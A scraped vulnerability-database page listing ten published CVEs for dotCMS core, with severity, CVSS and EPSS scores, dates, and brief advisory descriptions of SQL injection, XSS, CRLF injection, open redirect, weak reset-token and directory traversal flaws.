Core
by Dotcms
Source repositories
CVEs (10)
| CVE | Vendor / Product | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2016-2355 | Cri | 0.64 | 9.8 | 0.01 | Dec 19, 2016 | SQL injection vulnerability in the REST API in dotCMS before 3.3.2 allows remote attackers to execute arbitrary SQL commands via the stName parameter to api/content/save/1. | ||
| CVE-2016-8600 | Hig | 0.49 | 7.5 | 0.01 | Oct 28, 2016 | In dotCMS 3.2.1, attacker can load captcha once, fill it with correct value and then this correct value is ok for forms with captcha check later. | ||
| CVE-2016-4803 | Hig | 0.49 | 7.5 | 0.00 | Jun 30, 2016 | CRLF injection vulnerability in the send email functionality in dotCMS before 3.3.2 allows remote attackers to inject arbitrary email headers via CRLF sequences in the subject. | ||
| CVE-2018-17422 | 0.01 | — | 0.11 | Mar 7, 2019 | dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. | |||
| CVE-2022-45782 | 0.00 | — | 0.00 | Feb 1, 2023 | An issue was discovered in dotCMS core 5.3.8.5 through 5.3.8.15 and 21.03 through 22.10.1. A cryptographically insecure random generation algorithm for password-reset token generation leads to account takeover. | |||
| CVE-2022-45783 | 0.00 | — | 0.00 | Feb 1, 2023 | An issue was discovered in dotCMS core 4.x through 22.10.2. An authenticated directory traversal vulnerability in the dotCMS API can lead to Remote Code Execution. | |||
| CVE-2018-19554 | 0.00 | — | 0.00 | Nov 26, 2018 | An issue was discovered in Dotcms through 5.0.3. Attackers may perform XSS attacks via the inode, identifier, or fieldName parameter in html/js/dotcms/dijit/image/image_tool.jsp. | |||
| CVE-2018-16980 | 0.00 | — | 0.00 | Sep 12, 2018 | dotCMS V5.0.1 has XSS in the /html/portlet/ext/contentlet/image_tools/index.jsp fieldName and inode parameters. | |||
| CVE-2016-10007 | 0.00 | — | 0.00 | Feb 19, 2018 | SQL injection vulnerability in the "Marketing > Forms" screen in dotCMS before 3.7.2 and 4.x before 4.1.1 allows remote authenticated administrators to execute arbitrary SQL commands via the _EXT_FORM_HANDLER_orderBy parameter. | |||
| CVE-2016-10008 | 0.00 | — | 0.00 | Feb 19, 2018 | SQL injection vulnerability in the "Content Types > Content Types" screen in dotCMS before 3.7.2 and 4.x before 4.1.1 allows remote authenticated administrators to execute arbitrary SQL commands via the _EXT_STRUCTURE_direction parameter. |
- risk 0.64cvss 9.8epss 0.01
SQL injection vulnerability in the REST API in dotCMS before 3.3.2 allows remote attackers to execute arbitrary SQL commands via the stName parameter to api/content/save/1.
- risk 0.49cvss 7.5epss 0.01
In dotCMS 3.2.1, attacker can load captcha once, fill it with correct value and then this correct value is ok for forms with captcha check later.
- risk 0.49cvss 7.5epss 0.00
CRLF injection vulnerability in the send email functionality in dotCMS before 3.3.2 allows remote attackers to inject arbitrary email headers via CRLF sequences in the subject.
- CVE-2018-17422Mar 7, 2019risk 0.01cvss —epss 0.11
dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter.
- CVE-2022-45782Feb 1, 2023risk 0.00cvss —epss 0.00
An issue was discovered in dotCMS core 5.3.8.5 through 5.3.8.15 and 21.03 through 22.10.1. A cryptographically insecure random generation algorithm for password-reset token generation leads to account takeover.
- CVE-2022-45783Feb 1, 2023risk 0.00cvss —epss 0.00
An issue was discovered in dotCMS core 4.x through 22.10.2. An authenticated directory traversal vulnerability in the dotCMS API can lead to Remote Code Execution.
- CVE-2018-19554Nov 26, 2018risk 0.00cvss —epss 0.00
An issue was discovered in Dotcms through 5.0.3. Attackers may perform XSS attacks via the inode, identifier, or fieldName parameter in html/js/dotcms/dijit/image/image_tool.jsp.
- CVE-2018-16980Sep 12, 2018risk 0.00cvss —epss 0.00
dotCMS V5.0.1 has XSS in the /html/portlet/ext/contentlet/image_tools/index.jsp fieldName and inode parameters.
- CVE-2016-10007Feb 19, 2018risk 0.00cvss —epss 0.00
SQL injection vulnerability in the "Marketing > Forms" screen in dotCMS before 3.7.2 and 4.x before 4.1.1 allows remote authenticated administrators to execute arbitrary SQL commands via the _EXT_FORM_HANDLER_orderBy parameter.
- CVE-2016-10008Feb 19, 2018risk 0.00cvss —epss 0.00
SQL injection vulnerability in the "Content Types > Content Types" screen in dotCMS before 3.7.2 and 4.x before 4.1.1 allows remote authenticated administrators to execute arbitrary SQL commands via the _EXT_STRUCTURE_direction parameter.